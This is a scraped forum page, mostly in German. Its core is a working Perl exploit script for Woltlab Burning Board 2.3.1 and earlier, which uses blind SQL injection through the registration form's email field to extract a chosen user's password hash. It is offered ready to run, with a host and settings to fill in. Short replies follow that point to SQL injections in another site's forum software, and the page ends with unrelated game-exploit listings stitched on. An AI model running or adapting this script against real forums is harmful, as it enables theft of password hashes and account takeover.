#!/usr/bin/perl
use strict;
use IO::Socket::INET;
$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit [url]www.security-project.org[/url]
Exploit by deluxe89
----------
";
my $host = '[url]www.security-project.org';[/url]
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards
# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}
#
# Get the hash
#
print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";
my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');
if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";
sub test
{
my ($i, $num, $g) = @_;
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";
print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";
while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}
Nein wbb ist eine andere software, Epvp benutzt
außerdem Invision Power Board(U) v1.3, dazu gibts auch ein paar sql injections falls die noch ned gefixxt sind xD
(forums)
SQL inject steht für SQL injection, das heißt das dein SQL Query(befehl) ausgeführt werden kann z.b Datenbank löschen, Root acess kriegen... etc
[Exploit] Human Illusion Exploit On 2.3.3 03/24/2008 - WoW Exploits, Hacks, Tools & Macros - 30 Replies Alright this is simple it has a
22%Chance of not working on first try 100% on second
Step1:Get level 66
Step2:Get attuned to Durnehold Keep
Step3:Buy savory deviate delights.
Step4:Zone in on Durnhold Keep
Step5:Get to the keep
Step6:Now listen carfully attack the first elite mob you see with an arrow/spell(Anything ranged is better.) Now before the mob attacks you back use a savory deviate delight, now let yourself die, DO NOT ATTACK THE MOB A SECOND TIME!
Step7:Now if you noticed...
[Exploit][Arena]Kerzenständer Exploit 01/19/2008 - WoW Exploits, Hacks, Tools & Macros - 7 Replies Guten Tag,
dieser Exploit geht nur in der Lorderon Arena. Im Vorbereitungsraum ist ein Kerzenständer und wenn man die gegner Feart in diesem Raum besteht eine Chacne (die nicht grade gering ist) das er im Fear hinter die Ständer läuft.
So habe ich schon einige Matches Gewonnen.
http://www.deinearmee.de/mull/kerzen.JPG
Gruß
Raa_de
Exploit - Re-Releaseing a exploit that got lost 01/11/2008 - WoW Exploits, Hacks, Tools & Macros - 0 Replies In the outlands its a nifty trick to use. Ill post examples at the end of this explanation how you can use it for something usefull.
What this is is bugging mobs onto a plattform or ledge where they cant get down or better said you normaly are not suppose to get to, i.e. like mushrooms in zangamarsh or thos ledges in slavepens.
So what you must do, go onto your normaly unreachable ledge or mushroom and choose a mob below you, use a throwing weapon or clap your hands and jump around, just...
[Exploit]O2Jam Gold Exploit 08/28/2006 - General Gaming Discussion - 3 Replies Make a new account and you get credited 10000g. Use that to buy items then send them to your main account, and repeat.